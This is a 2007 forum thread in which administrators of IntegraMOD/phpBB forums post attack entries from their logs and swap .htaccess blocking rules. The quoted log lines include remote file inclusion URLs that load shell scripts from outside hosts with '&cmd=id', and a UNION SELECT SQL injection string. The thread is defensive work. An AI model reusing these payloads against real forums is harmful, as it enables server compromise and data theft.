IntegraMOD

01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.250.108
4 30 Apr 2007 02:33 pm /forum/profile.php?mode=http://www.alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 200.138.244.203
5 29 Apr 2007 11:18 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
6 29 Apr 2007 11:45 am /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
7 29 Apr 2007 11:45 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.18.93.107
8 29 Apr 2007 10:16 am /forum/profile.php?mode=http://www.zjkjw.gov.cn/tool25.txt?&cmd=id 200.181.152.9
9 29 Apr 2007 09:22 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.79.243
10 28 Apr 2007 10:29 pm /forum/profile.php?mode=http://www.Vel0zBR.xpg.com.br/Owner/cmd1.txt?&cmd=id 200.153.54.199
11 27 Apr 2007 06:23 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.2.78.239
12 26 Apr 2007 06:44 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 200.97.25.94
13 25 Apr 2007 11:19 pm /forum/profile.php?mode=http://br.geocities.com/ngrdownz/list.txt?&cmd=id 213.22.52.189
14 25 Apr 2007 11:10 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137
15 25 Apr 2007 07:49 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137

Note: Anytime I tried to add one of those address's to agent blocker it would break the site. CrackTracker would throw a bunch of code line at the top of the page.

Thought I'd add a few more.

1 08 May 2007 07:16 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.67.182.247
2 08 May 2007 05:11 pm /forum/profile.php?mode=http://www.freewebs.com/dropcmd/tool25.dat?&cmd=id 189.13.156.90
3 08 May 2007 11:20 am /forum/profile.php?mode=http://dropcmd.netfast.org/tool25.txt?&cmd=id 201.9.15.12
4 08 May 2007 01:17 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 189.13.114.100
5 07 May 2007 11:54 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.9.96.227
6 06 May 2007 09:21 pm /forum/profile.php?mode=http://www.tools25.kit.net/tool25.dat?&cmd=id 201.8.90.148

Have you run into this tool yet?

http://securityjobs.us/xpl/tembak.txt?

I think this one gets tru but I'm not 100% sure.
I have 4 hits from it and the forum goes down to a .script kiddie pr message.

Good initiative Omni-Lee. I leave here my contribution.

201.50.228.87
04 Jul 2007 01:11 am /forum/IM141/profile.php?mode=http://www.butterbeidefische.de/DB59528/tool25.txt?&cmd=id
[hr:1wyttcgu]
libwww-perl/5.69 217.110.144.106
13 Jul 2007 06:02 am /forum/postings_popup.php?t=69//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?
/forum/viewtopic.php?printertopic=1&t=9&start=0&postdays=0&postorder=asc&vote=viewresult//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?

I have been getting slammed with lots of similar stuff daily from about 10 different domains. Each day it a whole new block of domains. But thank god none of them have work as they get caught and dumpped as 403 errors.

Once I noticed I did spend the first few days reporting sites getting them shut down but once I realized they change domains daily it doesn't make any sense andits mucho work.

Though I have been editing mt htaccess to block any traffic form said urls ever again when they start the rotation of domains over at some point.

Though I have been editing my htaccess to block any traffic form said urls ever again when they start the rotation of domains over at some point.

I'm using the ip's not the url's, i know the ip's are proxies but I figure I've a better chance to block. (although that .script didn't work the prox did... so if i block the prox I may well stop a run with a .script that does work.)

As soon as i get a attempt I add the ip to the htaccess, this creates a update to my proxy ban list. Also I have started adding " # date " (rem statements) once the prox is dead it could be removed from the list and help keep the htaccess file size down as I think the file gets processed on every hit.

one more.
/forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

I've got serious attacks (hopefully blocked) several times a day on my portal!


[color=red]62.60.137.49
Fri 20 Jul 2007, 5]


This proove that people complaining here about the insecurity of IM or the innutility of CrackerTracker are just idiots in my opinion <img>

yea my logs look like that too, for all the trouble setting up CT I got to say it was worth it. <img>

still was not for this but should be barely... <img>

This brutes do not have life, do not eat, do not drink, do not sleep, I have there xxx but I find that also do not want.

yep, I had to change domains and get a new host from all of that. I changed domains so they wouldn't just follow me to my new host, and had to get a new host from so many hack attempts I was over my traffic limits for CGI.

Buddy just lost 3 of his 141 IM forums today. They deleted everything. He dunno how they got root access but all is gone.

Although I don't like doing this I have added this to my htaccess file. It's really cut back the number of runs on my forum.

jomasaco, I think you need to add it for sure!

RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]

So you need it to look like this in the htaccess file.

Code: Select all

 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]# end testRewriteRule ^.* - [F,L]  

If the rewriteengine is already on just add the first line in the quote if not add the whole code to the file so it will process it.

Code: Select all

 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]# end testRewriteRule ^.* - [F,L]  

Definitly interresting, thank you <img>

NP whisky, day 4 since i added that myself. On a side note it's been nice and quiet. <img>

When my IM site got hit a while back, I ended up blocking URL's with "/includes" or "/function*" in them.

Note: I also turned off allow_fopen_url in the php.ini

.htaccess or httpd.conf
===============

<Files>
Order allow,deny
Deny from all
</Files>

<Files>
Order allow,deny
Deny from all
</Files>



We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

[Fri Aug 17 15:06:54 2007] [error] [client 203.32.125.78] client denied by server configuration: /websites/HG/html/includes/functions_portal.php


I like the URL Rewrite as well though. May consider that as a follow-up to catch the others that arent using the include or function* paths.

We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

using rewrite, it kills the tool that is hitting me in about 85% of the attacks. This makes the log smaller so if you try it, set it up to process the rewrite first then the url's it could help speed things up a bit (this file is processed on every request I believe) and make a little less work with the logs for you.

Just a thought.

Checking the log file I found this little number:

Code: Select all

/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+0x2D4578372D31,0x2D4578372D32,0x2D4578372D33,0x2D4578372D34,0x2D4578372D35,0x2D4578372D36,0x2D4578372D37,0x2D4578372D38,0x2D4578372D39,0x2D4578372D3130,0x2D4578372D3131,0x2D4578372D3132,0x2D4578372D3133,0x2D4578372D3134,0x2D4578372D3135,0x2D4578372D3136,0x2D4578372D3137,0x2D4578372D3138,0x2D4578372D3139,0x2D4578372D3230,0x2D4578372D3231,0x2D4578372D3232,0x2D4578372D3233,0x2D4578372D3234,0x2D4578372D3235,0x2D4578372D3236,0x2D4578372D3237,0x2D4578372D3238,0x2D4578372D3239,0x2D4578372D3330,0x2D4578372D3331,0x2D4578372D3332,0x2D4578372D3333,0x2D4578372D3334,0x2D4578372D3335,0x2D4578372D3336,0x2D4578372D3337,0x2D4578372D3338,0x2D4578372D3339,0x2D4578372D3430,0x2D4578372D3431,0x2D4578372D3432,0x2D4578372D3433,0x2D4578372D3434,0x2D4578372D3435,0x2D4578372D3436,0x2D4578372D3437,0x2D4578372D3438,0x2D4578372D3439,0x2D4578372D3530/*

What the heck is it?

Btw, what is that Rewrite in .htaccess? Can it be used for attacks like what I posted above?

post the full attack like this:

forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

and If i have a .htaccess rule I'll post it, the attack type is in that url "union+select".

I tried the RewriteCond code you supplied and I get 403 Access Denied. It was a direct copy and paste.

*Edit*: I found the problem, the [OR] can only be used when there is going to be another command (possibly of a similar type).

Code: Select all

 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]RewriteCond %{HTTP_USER_AGENT} ai_archiver# end testRewriteRule ^.* - [F,L]

Thats correct, did you check to see if that block will stop that?

I've been watching and the logs have been clean. Whats totally nuts is I actually want to see an entry now, just so I can block it. Thanks for that bit of code. With the error, inadvertent as it was, I researched .htaccess commands and found ways to further secure my site. Specifically hiding the .htaccess file from external requests. I never knew all the good things that could be done in .htaccess, it is a pretty powerful file.